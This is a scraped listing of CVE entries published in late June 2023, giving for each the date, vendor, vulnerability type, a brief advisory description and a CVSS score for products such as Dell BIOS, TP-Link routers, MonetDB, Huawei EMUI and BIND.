2023-06-23 CVE-2023-28073 Dell Improper Authentication vulnerability in Dell Latitude 5530 Firmware and Precision 3570 Firmware

Dell BIOS contains an improper authentication vulnerability.

7.8
2023-06-23 CVE-2023-36192 Irontec Out-of-bounds Write vulnerability in Irontec Sngrep 1.6.0

Sngrep v1.6.0 was discovered to contain a heap buffer overflow via the function capture_ws_check_packet at /src/capture.c.

7.8
2023-06-23 CVE-2023-36193 Lcdf Out-of-bounds Write vulnerability in Lcdf Gifsicle 1.93

Gifsicle v1.9.3 was discovered to contain a heap buffer overflow via the ambiguity_error component at /src/clp.c.

7.8
2023-06-22 CVE-2023-28006 Hcltech Use of a Broken or Risky Cryptographic Algorithm vulnerability in Hcltech Bigfix OSD Bare Metal Server

The OSD Bare Metal Server uses a cryptographic algorithm that is no longer considered sufficiently secure.

7.8
2023-06-22 CVE-2023-36243 Flvmeta Classic Buffer Overflow vulnerability in Flvmeta 1.2.1

FLVMeta v1.2.1 was discovered to contain a buffer overflow via the xml_on_metadata_tag_only function at dump_xml.c.

7.8
2023-06-22 CVE-2023-32449 Dell Improper Verification of Cryptographic Signature vulnerability in Dell Powerstoret OS

Dell PowerStore versions prior to 3.5 contain an improper verification of cryptographic signature vulnerability.

7.8
2023-06-22 CVE-2023-28956 IBM Unspecified vulnerability in IBM Spectrum Protect Backup-Archive Client

IBM Spectrum Protect Backup-Archive Client 8.1.0.0 through 8.1.17.2 may allow a local user to escalate their privileges due to improper access controls.

7.8
2023-06-19 CVE-2023-30759 Ricoh Insufficient Verification of Data Authenticity vulnerability in Ricoh Printer Driver Packager NX

The driver installation package created by Printer Driver Packager NX v1.0.02 to v1.1.25 fails to detect its modification and may spawn an unexpected process with the administrative privilege.

7.8
2023-06-19 CVE-2023-31239 Fujielectric Out-of-bounds Read vulnerability in Fujielectric V-Server 4.0.15.0

Stack-based buffer overflow vulnerability in V-Server v4.0.15.0 and V-Server Lite v4.0.15.0 and earlier allows an attacker to execute arbitrary code by having user open a specially crafted VPR file.

7.8
2023-06-19 CVE-2023-32201 Fujielectric Out-of-bounds Write vulnerability in Fujielectric Tellus and Tellus Lite

Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32270 Fujielectric Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Fujielectric Tellus and Tellus Lite

Access of memory location after end of buffer issue exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32273 Fujielectric Out-of-bounds Write vulnerability in Fujielectric Tellus and Tellus Lite

Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32276 Fujielectric Out-of-bounds Write vulnerability in Fujielectric Tellus and Tellus Lite

Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32288 Fujielectric Out-of-bounds Read vulnerability in Fujielectric Tellus and Tellus Lite

Out-of-bounds read vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32538 Fujielectric Out-of-bounds Write vulnerability in Fujielectric Tellus and Tellus Lite

Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32542 Fujielectric Out-of-bounds Read vulnerability in Fujielectric Tellus and Tellus Lite

Out-of-bounds read vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-34641 Kioware Unspecified vulnerability in Kioware

KioWare for Windows through v8.33 was discovered to contain an incomplete blacklist filter for blocked dialog boxes on Windows 10.

7.8
2023-06-19 CVE-2023-34642 Kioware Unspecified vulnerability in Kioware

KioWare for Windows through v8.33 was discovered to contain an incomplete blacklist filter for blocked dialog boxes on Windows 10.

7.8
2023-06-22 CVE-2023-3114 Hashicorp Incorrect Authorization vulnerability in Hashicorp Terraform Enterprise

Terraform Enterprise since v202207-1 did not properly implement authorization rules for agent pools, allowing the workspace to be targeted by unauthorized agents.

7.7
2023-06-22 CVE-2023-36356 TP Link Out-of-bounds Read vulnerability in Tp-Link products

TP-Link TL-WR940N V2/V4/V6, TL-WR841N V8, TL-WR941ND V5, and TL-WR740N V1/V2 were discovered to contain a buffer read out-of-bounds via the component /userRpm/VirtualServerRpm.

7.7
2023-06-22 CVE-2023-36357 TP Link Unspecified vulnerability in Tp-Link products

An issue in the /userRpm/LocalManageControlRpm component of TP-Link TL-WR940N V2/V4/V6, TL-WR841N V8/V10, and TL-WR941ND V5 allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

7.7
2023-06-22 CVE-2023-36358 TP Link Classic Buffer Overflow vulnerability in Tp-Link products

TP-Link TL-WR940N V2/V3/V4, TL-WR941ND V5/V6, TL-WR743ND V1 and TL-WR841N V8 were discovered to contain a buffer overflow in the component /userRpm/AccessCtrlAccessTargetsRpm.

7.7
2023-06-23 CVE-2023-1783 Orangescrum Cross-site Scripting vulnerability in Orangescrum 2.0.11

OrangeScrum version 2.0.11 allows an external attacker to remotely obtain AWS instance credentials.

7.6
2023-06-23 CVE-2023-25515 Nvidia Unspecified vulnerability in Nvidia GPU Display Driver and Virtual GPU

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where unexpected untrusted data is parsed, which may lead to code execution, denial of service, escalation of privileges, data tampering, or information disclosure.

7.6
2023-06-25 CVE-2023-36661 Shibboleth
Debian
Server-Side Request Forgery (SSRF) vulnerability in multiple products

Shibboleth XMLTooling before 3.2.4, as used in OpenSAML and Shibboleth Service Provider, allows SSRF via a crafted KeyInfo element.

7.5
2023-06-25 CVE-2023-36632 Python Uncontrolled Recursion vulnerability in Python

The legacy email.utils.parseaddr function in Python through 3.11.4 allows attackers to trigger "RecursionError: maximum recursion depth exceeded while calling a Python object" via a crafted argument.

7.5
2023-06-25 CVE-2023-36612 Basecamp Path Traversal vulnerability in Basecamp

Directory traversal can occur in the Basecamp com.basecamp.bc3 application before 4.2.1 for Android, which may allow an attacker to write arbitrary files in the application's private directory.

7.5
2023-06-23 CVE-2023-34188 Cesanta Unspecified vulnerability in Cesanta Mongoose

The HTTP server in Mongoose before 7.10 accepts requests containing negative Content-Length headers.

7.5
2023-06-23 CVE-2023-32397 Apple Unspecified vulnerability in Apple Ipados and Macos

A logic issue was addressed with improved state management.

7.5
2023-06-23 CVE-2023-34467 Xwiki Exposure of Resource to Wrong Sphere vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

7.5
2023-06-23 CVE-2023-35151 Xwiki Exposure of Resource to Wrong Sphere vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

7.5
2023-06-23 CVE-2023-36284 Webkul SQL Injection vulnerability in Webkul Qloapps 1.6.0

An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.

7.5
2023-06-23 CVE-2022-47614 Inspireui SQL Injection vulnerability in Inspireui Mstore API

Unauth.

7.5
2023-06-23 CVE-2023-29860 Dtstack Incorrect Permission Assignment for Critical Resource vulnerability in Dtstack Taier 1.3.0

An insecure permissions in /Taier/API/tenant/listTenant interface in DTStack Taier 1.3.0 allows attackers to view sensitive information via the getCookie method.

7.5
2023-06-23 CVE-2023-30362 Libcoap Out-of-bounds Read vulnerability in Libcoap

Buffer Overflow vulnerability in coap_send function in libcoap library 4.3.1-103-g52cfd56 fixed in 4.3.1-120-ge242200 allows attackers to obtain sensitive information via malformed pdu.

7.5
2023-06-23 CVE-2023-32463 Dell Unspecified vulnerability in Dell products

Dell VxRail, version(s) 8.0.100 and earlier contain a denial-of-service vulnerability in the upgrade functionality.

7.5
2023-06-23 CVE-2023-33141 Microsoft Unspecified vulnerability in Microsoft YET Another Reverse Proxy

Yet Another Reverse Proxy (YARP) Denial of Service Vulnerability

7.5
2023-06-22 CVE-2023-32320 Nextcloud Improper Restriction of Excessive Authentication Attempts vulnerability in Nextcloud Server

Nextcloud Server is a data storage system for Nextcloud, a self-hosted productivity platform.

7.5
2023-06-22 CVE-2023-35133 Moodle Server-Side Request Forgery (SSRF) vulnerability in Moodle

An issue in the logic used to check 0.0.0.0 against the cURL blocked hosts lists resulted in an SSRF risk.

7.5
2023-06-22 CVE-2023-2990 Globalscape Uncontrolled Recursion vulnerability in Globalscape EFT Server 6.2.31.2

Fortra Globalscape EFT versions before 8.1.0.16 suffer from a denial of service vulnerability, where a compressed message that decompresses to itself can cause infinite recursion and crash the service

7.5
2023-06-22 CVE-2023-36354 TP Link Classic Buffer Overflow vulnerability in Tp-Link products

TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR740N V1/V2, TL-WR940N V2/V3, and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/AccessCtrlTimeSchedRpm.

7.5
2023-06-22 CVE-2023-36359 TP Link Classic Buffer Overflow vulnerability in Tp-Link products

TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR940N V2/V3 and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/QoSRuleListRpm.

7.5
2023-06-22 CVE-2023-36362 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the rel_sequences component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36363 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the __nss_database_lookup component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36364 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the rel_deps component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36365 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the sql_trans_copy_key component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36366 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the log_create_delta component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36367 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the BLOBcmp component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36368 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the cs_bind_ubat component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36369 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the list_append component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36370 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the gc_col component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36371 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the GDKfree component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-20896 Vmware Out-of-bounds Read vulnerability in VMWare Vcenter Server

The VMware vCenter Server contains an out-of-bounds read vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bounds read by sending a specially crafted packet leading to denial-of-service of certain services (vmcad, vmdird, and vmafdd).

7.5
2023-06-22 CVE-2023-29708 Wavlink Unspecified vulnerability in Wavlink Wavrouter APP Rpt70Ha1.X

An issue was discovered in /cgi-bin/adm.cgi in WavLink WavRouter version RPT70HA1.x, allows attackers to force a factory reset via crafted payload.

7.5
2023-06-22 CVE-2023-29709 Wildix Unspecified vulnerability in Wildix Wsg24Poe Firmware 103Sp7D190822

An issue was discovered in /cgi-bin/login_rj.cgi in Wildix WSG24POE version 103SP7D190822, allows attackers to bypass authentication.

7.5
2023-06-22 CVE-2023-26115 Word Wrap Project Unspecified vulnerability in Word-Wrap Project Word-Wrap

All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable.

7.5
2023-06-21 CVE-2023-33289 Urlnorm Project Unspecified vulnerability in Urlnorm Project Urlnorm

The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.

7.5
2023-06-21 CVE-2023-0026 Juniper Improper Input Validation vulnerability in Juniper Junos

An Improper Input Validation vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS).

7.5
2023-06-21 CVE-2023-2828 ISC
Debian
Fedoraproject
Netapp
Allocation of Resources Without Limits or Throttling vulnerability in multiple products

Every `named` instance configured to run as a recursive resolver maintains a cache database holding the responses to the queries it has recently sent to authoritative servers.

7.5
2023-06-21 CVE-2023-2829 ISC
Netapp
A `named` instance configured to run as a DNSSEC-validating recursive resolver with the Aggressive Use of DNSSEC-Validated Cache (RFC 8198) option (`synth-from-dnssec`) enabled can be remotely terminated using a zone with a malformed NSEC record. This issue affects BIND 9 versions 9.16.8-S1 through 9.16.41-S1 and 9.18.11-S1 through 9.18.15-S1.
7.5
2023-06-21 CVE-2023-2911 ISC
Debian
Fedoraproject
Netapp
Out-of-bounds Write vulnerability in multiple products

If the `recursive-clients` quota is reached on a BIND 9 resolver configured with both `stale-answer-enable yes;` and `stale-answer-client-timeout 0;`, a sequence of serve-stale-related lookups could cause `named` to loop and terminate unexpectedly due to a stack overflow. This issue affects BIND 9 versions 9.16.33 through 9.16.41, 9.18.7 through 9.18.15, 9.16.33-S1 through 9.16.41-S1, and 9.18.11-S1 through 9.18.15-S1.

7.5
2023-06-21 CVE-2023-27243 Makves Cleartext Storage of Sensitive Information vulnerability in Makves Dcap 3.0.0.122/3.0.0.183

An access control issue in Makves DCAP v3.0.0.122 allows unauthenticated attackers to obtain cleartext credentials via a crafted web request to the product API.

7.5
2023-06-21 CVE-2023-34981 Apache Unspecified vulnerability in Apache Tomcat

A regression in the fix for bug 66512 in Apache Tomcat 11.0.0-M5, 10.1.8, 9.0.74 and 8.5.88 meant that, if a response did not include any HTTP headers no AJP SEND_HEADERS messare woudl be sent for the response which in turn meant that at least one AJP proxy (mod_proxy_ajp) would use the response headers from the previous request leading to an information leak.

7.5
2023-06-21 CVE-2023-3339 Agro School Management System Project SQL Injection vulnerability in Agro-School Management System Project Agro-School Management System 1.0

A vulnerability has been found in code-projects Agro-School Management System 1.0 and classified as critical.

7.5
2023-06-21 CVE-2022-25883 Npmjs Unspecified vulnerability in Npmjs Semver

Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

7.5
2023-06-20 CVE-2023-32274 Enphase Use of Hard-coded Credentials vulnerability in Enphase Installer Toolkit 3.27.0

Enphase Installer Toolkit versions 3.27.0 has hard coded credentials embedded in binary code in the Android application.

7.5
2023-06-20 CVE-2020-20335 Kilo Project Integer Overflow or Wraparound vulnerability in Kilo Project Kilo 0.0.1

Buffer Overflow vulnerability in Antirez Kilo before commit 7709a04ae8520c5b04d261616098cebf742f5a23 allows a remote attacker to cause a denial of service via the editorUpdateRow function in kilo.c.

7.5
2023-06-20 CVE-2020-20636 Joyplus CMS Project SQL Injection vulnerability in Joyplus-Cms Project Joyplus-Cms 1.6.0

SQL injection vulnerability found in Joyplus-cms v.1.6.0 allows a remote attacker to access sensitive information via the id parameter of the goodbad() function.

7.5
2023-06-20 CVE-2020-21486 Phpok SQL Injection vulnerability in PHPok 5.4

SQL injection vulnerability in PHPOK v.5.4.

7.5
2023-06-20 CVE-2023-1999 Webmproject Use After Free vulnerability in Webmproject Libwebp

There exists a use after free/double free in libwebp.

7.5
2023-06-19 CVE-2023-35843 Nocodb Path Traversal vulnerability in Nocodb

NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route.

7.5
2023-06-19 CVE-2023-3312 Linux Double Free vulnerability in Linux Kernel

A vulnerability was found in drivers/cpufreq/qcom-cpufreq-hw.c in cpufreq subsystem in the Linux Kernel.

7.5
2023-06-19 CVE-2022-48486 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48487 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48489 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48490 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48492 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48493 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48494 Huawei Improper Authentication vulnerability in Huawei Emui

Vulnerability of lax app identity verification in the pre-authorization function.Successful exploitation of this vulnerability will cause malicious apps to become pre-authorized.

7.5
2023-06-19 CVE-2022-48496 Huawei Improper Authentication vulnerability in Huawei Emui

Vulnerability of lax app identity verification in the pre-authorization function.Successful exploitation of this vulnerability will cause malicious apps to become pre-authorized.

7.5
2023-06-19 CVE-2022-48497 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48498 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48499 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48500 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48501 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2023-34155 Huawei Unspecified vulnerability in Huawei Emui 13.0.0

Vulnerability of unauthorized calling on HUAWEI phones and tablets.Successful exploitation of this vulnerability may affect availability.

7.5
2023-06-19 CVE-2023-34161 Huawei Incorrect Authorization vulnerability in Huawei Emui

nappropriate authorization vulnerability in the SettingsProvider module.Successful exploitation of this vulnerability may cause features to perform abnormally.

7.5
2023-06-19 CVE-2023-34162 Huawei Unspecified vulnerability in Huawei Emui 13.0.0

Version update determination vulnerability in the user profile module.Successful exploitation of this vulnerability may cause repeated HMS Core updates and cause services to fail.

7.5
2023-06-19 CVE-2023-34163 Huawei Unspecified vulnerability in Huawei Emui

Permission control vulnerability in the window management module.Successful exploitation of this vulnerability may cause features to perform abnormally.

7.5
2023-06-19 CVE-2023-34166 Huawei Resource Exhaustion vulnerability in Huawei Emui

Vulnerability of system restart triggered by abnormal callbacks passed to APIs.Successful exploitation of this vulnerability may cause the system to restart.

7.5
2023-06-19 CVE-2023-25733 Mozilla Unchecked Return Value vulnerability in Mozilla Firefox

The return value from `gfx::SourceSurfaceSkia::Map()` wasn't being verified which could have potentially lead to a null pointer dereference.

7.5
2023-06-19 CVE-2023-25747 Mozilla Use After Free vulnerability in Mozilla Firefox

A potential use-after-free in libaudio was fixed by disabling the AAudio backend when running on Android API below version 30. *This bug only affects Firefox for Android.

7.5
2023-06-19 CVE-2023-32209 Mozilla Out-of-bounds Write vulnerability in Mozilla Firefox

A maliciously crafted favicon could have led to an out of memory crash.

7.5
2023-06-19 CVE-2023-32214 Mozilla Unspecified vulnerability in Mozilla Firefox

Protocol handlers `ms-cxh` and `ms-cxh-full` could have been leveraged to trigger a denial of service. *Note: This attack only affects Windows.

7.5
2023-06-19 CVE-2023-34602 Jeecg SQL Injection vulnerability in Jeecg Jeecgboot

JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryTableDictItemsByCode at org.jeecg.modules.api.controller.SystemApiController.

7.5
2023-06-19 CVE-2023-34603 Jeecg SQL Injection vulnerability in Jeecg Jeecgboot

JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryFilterTableDictInfo at org.jeecg.modules.api.controller.SystemApiController.

7.5
2023-06-19 CVE-2023-35852 Oisf Path Traversal vulnerability in Oisf Suricata

In Suricata before 6.0.13 (when there is an adversary who controls an external source of rules), a dataset filename, that comes from a rule, may trigger absolute or relative directory traversal, and lead to write access to a local filesystem.

7.5
2023-06-19 CVE-2023-35846 Virtualsquare Unspecified vulnerability in Virtualsquare Picotcp

VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 does not check the transport layer length in a frame before performing port filtering.

7.5
2023-06-19 CVE-2023-35847 Virtualsquare Use of Uninitialized Resource vulnerability in Virtualsquare Picotcp

VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 does not have an MSS lower bound (e.g., it could be zero).

7.5
2023-06-19 CVE-2023-35848 Virtualsquare Incorrect Calculation vulnerability in Virtualsquare Picotcp

VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 lacks certain size calculations before attempting to set a value of an mss structure member.

7.5
2023-06-19 CVE-2023-35849 Virtualsquare Improper Check for Unusual or Exceptional Conditions vulnerability in Virtualsquare Picotcp

VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 does not properly check whether header sizes would result in accessing data outside of a packet.

7.5
2023-06-19 CVE-2023-35844 Lightdash Path Traversal vulnerability in Lightdash

packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow ..

7.5
2023-06-19 CVE-2023-31410 Sick Cleartext Transmission of Sensitive Information vulnerability in Sick Eventcam APP

A remote unprivileged attacker can intercept the communication via e.g.

7.4
2023-06-23 CVE-2023-28065 Dell Link Following vulnerability in Dell Alienware Update, Command Update and Update

Dell Command | Update, Dell Update, and Alienware Update versions 4.8.0 and prior contain an Insecure Operation on Windows Junction / Mount Point vulnerability.

7.3
2023-06-20 CVE-2023-1862 Cloudflare Unspecified vulnerability in Cloudflare Warp

Cloudflare WARP client for Windows (up to v2023.3.381.0) allowed a malicious actor to remotely access the warp-svc.exe binary due to an insufficient access control policy on an IPC Named Pipe.

7.3
2023-06-24 CVE-2023-1721 Yoga Class Registration System Project Unrestricted Upload of File with Dangerous Type vulnerability in Yoga Class Registration System Project Yoga Class Registration System 1.0

Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server.

7.2
2023-06-23 CVE-2023-34254 Glpi Project OS Command Injection vulnerability in Glpi-Project Glpi Agent

The GLPI Agent is a generic management agent.

7.2
2023-06-23 CVE-2023-3393 Fossbilling Code Injection vulnerability in Fossbilling

Code Injection in GitHub repository fossbilling/fossbilling prior to 0.5.1.

7.2
2023-06-22 CVE-2023-27083 Pluck CMS Unrestricted Upload of File with Dangerous Type vulnerability in Pluck-Cms Pluck 4.7.15/4.7.16

An issue discovered in /admin.php in Pluck CMS 4.7.15 through 4.7.16-dev5 allows remote attackers to run arbitrary code via manage file functionality.

7.2
2023-06-22 CVE-2023-31867 Sage Improper Neutralization of Formula Elements in a CSV File vulnerability in Sage X3 12.14.0.500

Sage X3 version 12.14.0.50-0 is vulnerable to CSV Injection.

7.2
2023-06-21 CVE-2023-24261 GL Inet OS Command Injection vulnerability in Gl-Inet Gl-E750 Firmware

A vulnerability in GL.iNET GL-E750 Mudi before firmware v3.216 allows authenticated attackers to execute arbitrary code via a crafted POST request.

7.2
2023-06-20 CVE-2020-20491 Opencart SQL Injection vulnerability in Opencart

SQL injection vulnerability in OpenCart v.2.2.00 thru 3.0.3.2 allows a remote attacker to execute arbitrary code via the Fba plugin function in upload/admin/index.php.

7.2
2023-06-20 CVE-2020-20918 Pluck CMS Code Injection vulnerability in Pluck-Cms Pluck 4.7.10

An issue discovered in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary php code via the hidden parameter to admin.php when editing a page.

7.2
2023-06-20 CVE-2020-20919 Pluck CMS Unrestricted Upload of File with Dangerous Type vulnerability in Pluck-Cms Pluck 4.7.10

File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file.

7.2
2023-06-20 CVE-2020-20969 Pluck CMS Unrestricted Upload of File with Dangerous Type vulnerability in Pluck-Cms Pluck 4.7.10

File Upload vulnerability in PluckCMS v.4.7.10 allows a remote attacker to execute arbitrary code via the trashcan_restoreitem.php file.

7.2
2023-06-20 CVE-2020-21400 Phpmywind SQL Injection vulnerability in PHPmywind 5.6

SQL injection vulnerability in gaozhifeng PHPMyWind v.5.6 allows a remote attacker to execute arbitrary code via the id variable in the modify function.

7.2
2023-06-19 CVE-2023-2221 WP Custom Cursors Project Unspecified vulnerability in WP Custom Cursors Project WP Custom Cursors

The WP Custom Cursors WordPress plugin before 3.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.

7.2
2023-06-19 CVE-2023-2492 Querywall Plug N Play Firewall Project Unspecified vulnerability in Querywall Plug'N Play Firewall Project Querywall Plug'N Play Firewall

The QueryWall: Plug'n Play Firewall WordPress plugin through 1.1.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

7.2
2023-06-19 CVE-2023-2805 Supportcandy Unspecified vulnerability in Supportcandy

The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the agents[] parameter in the set_add_agent_leaves AJAX function before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

7.2
2023-06-23 CVE-2023-32357 Apple Unspecified vulnerability in Apple products

An authorization issue was addressed with improved state management.

7.1
2023-06-23 CVE-2023-32420 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

7.1
2023-06-23 CVE-2023-3317 Linux Use After Free vulnerability in Linux Kernel

A use-after-free flaw was found in mt7921_check_offload_capability in drivers/net/wireless/mediatek/mt76/mt7921/init.c in wifi mt76/mt7921 sub-component in the Linux Kernel.

7.1
2023-06-23 CVE-2023-28071 Dell Link Following vulnerability in Dell Alienware Update, Command Update and Update

Dell Command | Update, Dell Update, and Alienware Update versions 4.9.0, A01 and prior contain an Insecure Operation on Windows Junction / Mount Point vulnerability.

7.1
2023-06-22 CVE-2023-34241 Openprinting
Fedoraproject
Debian
Apple
Use After Free vulnerability in multiple products

OpenPrinting CUPS is a standards-based, open source printing system for Linux and other Unix-like operating systems.

7.1
2023-06-23 CVE-2023-32413 Apple Race Condition vulnerability in Apple products

A race condition was addressed with improved state handling.

7.0

251 Medium Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-06-23 CVE-2023-25518 Nvidia Unspecified vulnerability in Nvidia Jetson Linux

NVIDIA Jetson contains a vulnerability in CBoot, where the PCIe controller is initialized without IOMMU, which may allow an attacker with physical access to the target device to read and write to arbitrary memory.

6.8
2023-06-23 CVE-2023-32480 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an Improper Input Validation vulnerability.

6.8
2023-06-21 CVE-2023-0970 Silabs Classic Buffer Overflow vulnerability in Silabs Z/Ip Gateway SDK

Multiple buffer overflow vulnerabilities in SiLabs Z/IP Gateway SDK version 7.18.01 and earlier allow an attacker with invasive physical access to a Z-Wave controller device to overwrite global memory and potentially execute arbitrary code.

6.8
2023-06-23 CVE-2023-25938 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28026 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28027 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28031 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28034 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28036 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28044 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28050 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28058 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28060 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
